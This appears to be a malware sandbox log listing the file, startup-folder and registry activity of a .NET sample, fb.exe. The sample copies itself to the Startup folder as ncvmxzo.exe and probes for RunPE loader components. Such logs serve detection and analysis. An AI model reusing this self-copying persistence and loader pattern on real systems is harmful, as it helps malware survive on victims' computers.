C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe
\Device\NamedPipe\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2188.30070609
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2188.30070609
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2188.30070687
C:\Windows\System32\Branding\Basebrd\Basebrd.dll
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe"
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe.config
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe.Local\
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\Seven01\AppData\Roaming\Microsoft
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.INI
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\ncvmx.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\ncvmx.resources\ncvmx.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\ncvmx.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\ncvmx.resources\ncvmx.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\ncvmx.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\ncvmx.resources\ncvmx.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\ncvmx.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\ncvmx.resources\ncvmx.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\ncvmxzoureascvnz.txt
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2440.30072531
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2440.30072531
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2440.30072531
C:\Users\Seven01\AppData\Local\Temp\reg.*
C:\Users\Seven01\AppData\Local\Temp\reg
C:\ProgramData\Oracle\Java\javapath\reg.*
C:\ProgramData\Oracle\Java\javapath\reg
C:\Windows\System32\reg.*
C:\Windows\System32\reg.COM
C:\Windows\System32\reg.exe
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\SysWOW64\ntdll.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\fb.exe.config
C:\Users\Seven01\AppData\Local\Temp\fb.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
\Device\NamedPipe\
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe.config
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\SysWOW64\ntdll.dll

Write Files

C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe
C:\Users\Seven01\AppData\Local\Temp\ncvmxzoureascvnz.txt

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2188.30070609
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2188.30070609
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2188.30070687
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2440.30072531
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2440.30072531
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2440.30072531

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fb.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\683bcd0c\3496b50d
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
